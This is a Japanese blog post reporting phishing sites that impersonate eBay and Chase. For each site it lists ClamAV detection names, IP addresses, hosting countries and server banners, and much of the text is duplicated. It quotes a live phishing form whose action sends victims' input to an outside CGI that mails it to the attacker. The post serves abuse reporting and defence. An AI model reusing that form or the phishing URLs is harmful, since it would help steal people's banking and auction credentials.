フィッシング詐欺サイト情報
Yesterday: 
ClamAVでHTML.Phishing.Auction-102と検知されています。
mujweb.czのアドレスは212.47.13.223でチェコ、逆引きはatlas223.a2.atlas.czです。
詐欺ページのフォームは以下のようになっていてよそにあるできの悪いCGIを使ってメールで_1_MailServer@mail.deres-navn.dk に送られるようになっています。
<FORM action=http://muiecuspume.100free.com/memo/mailform.exe method=post ><INPUT type=hidden value=mail.deres-navn.dk name=_1_MailServer>
ttp://mujweb.cz/ のトップページはまったく無関係のページになっているのでこのサーバーがクラックされたものと思われます。
wwwサーバーの応答からはOSなどは不明ですがSMTPの応答によるとfreeweb.a2.atlas Microsoft ESMTP MAIL Service, Version: 6.0.3790.1830となるのでWindowと思われます。
ebay.comに通報しました。
mujweb.czのアドレスは212.47.13.223でチェコ、逆引きはatlas223.a2.atlas.czです。
詐欺ページのフォームは以下のようになっていてよそにあるできの悪いCGIを使ってメールで_1_MailServer@mail.deres-navn.dk に送られるようになっています。
<FORM action=http://muiecuspume.100free.com/memo/mailform.exe method=post ><INPUT type=hidden value=mail.deres-navn.dk name=_1_MailServer>
ttp://mujweb.cz/ のトップページはまったく無関係のページになっているのでこのサーバーがクラックされたものと思われます。
wwwサーバーの応答からはOSなどは不明ですがSMTPの応答によるとfreeweb.a2.atlas Microsoft ESMTP MAIL Service, Version: 6.0.3790.1830となるのでWindowと思われます。
ebay.comに通報しました。
● chase.comの偽サイト ttp://www.dotmp3.biz/online.chase.com/online/login//
login// は犯人のミスでしょう。
ClamAVでHTML.Phishing.Bank-391と検知されています。
アドレスは62.149.130.135でイタリーです。逆引きはwebs125.aruba.it。
サーバーの応答はMicrosoft-IIS/6.0です。
ClamAVでHTML.Phishing.Bank-391と検知されています。
アドレスは62.149.130.135でイタリーです。逆引きはwebs125.aruba.it。
サーバーの応答はMicrosoft-IIS/6.0です。
● chase.comの偽サイト ttp://www.chase-reward-signup.com/chase/index.htm
ClamAVでHTML.Phishing.Bank-362と検知されています。
アドレスは61.177.147.97で中国です。逆引きは無し。
サーバーの応答はApache/2.0.52 (Red Hat)です。
アドレスは61.177.147.97で中国です。逆引きは無し。
サーバーの応答はApache/2.0.52 (Red Hat)です。
● chase.comの偽サイト ttp://ip24-251-254-251.ph.ph.cox.net:84/chaseonline.chase.com/colportal/update_card.html
ClamAVでHTML.Phishing.Bank-159と検知されています。
すでにサーバーは停止しています。アドレスは24.251.254.251でアメリカです。
すでにサーバーは停止しています。アドレスは24.251.254.251でアメリカです。
● chase.comの偽サイト ttp://rds.yahoo.com/_ylt=3DA0LaSV66fNtDg.kAUoJXNyoA;_ylu=X3oDMTE2ZHVuZ3E3BGNvbG8DdwRsA1dTMQRwb3MDMwRzZWMDc3IEdnRpZANGNjU1Xzc1/SIG=148vsd1jp/EXP=1138544186/**http%3a//www.allround-service.hu/~coolgsm/.jpmorgan/index.php?WduaW5fcGFnZUx=aW5kZXgucGhwP3Byb3NwZWN0X25mcGI9dHJ1ZXBvcnRsZXRfc2lnbmluXzFfYWN0aW9uT3ZlcnJpZGVGY2hhc2VvbmxpbmVGc2lnbmluRnZlcmlm
ClamAVでHTML.Phishing.Bank-387と検知されています。
トップページはForbiddenとなるのですがttp://www.allround-service.hu/~coolgsm/に別コンテンツがあるのでクラックされているようです。
サーバーの応答はApache/1.3.33 (Unix) PHP/4.4.0です。
トップページはForbiddenとなるのですがttp://www.allround-service.hu/~coolgsm/に別コンテンツがあるのでクラックされているようです。
サーバーの応答はApache/1.3.33 (Unix) PHP/4.4.0です。
● chase.comの偽サイト ttp://66.162.158.230:81/colappmgr/
ClamAVでHTML.Phishing.Bank-386と検知されています。
デコードされる前のURLは以下の表記です。
ttp://66.162.158.230:81/colappmgr/
すでにサーバーは停止しています。アドレス66.162.158.230はアメリカです。逆引きは66-162-158-230.gen.nti.us。
デコードされる前のURLは以下の表記です。
ttp://66.162.158.230:81/colappmgr/
すでにサーバーは停止しています。アドレス66.162.158.230はアメリカです。逆引きは66-162-158-230.gen.nti.us。
— posted by staff @ 08:39AM
| TrackBack(0)
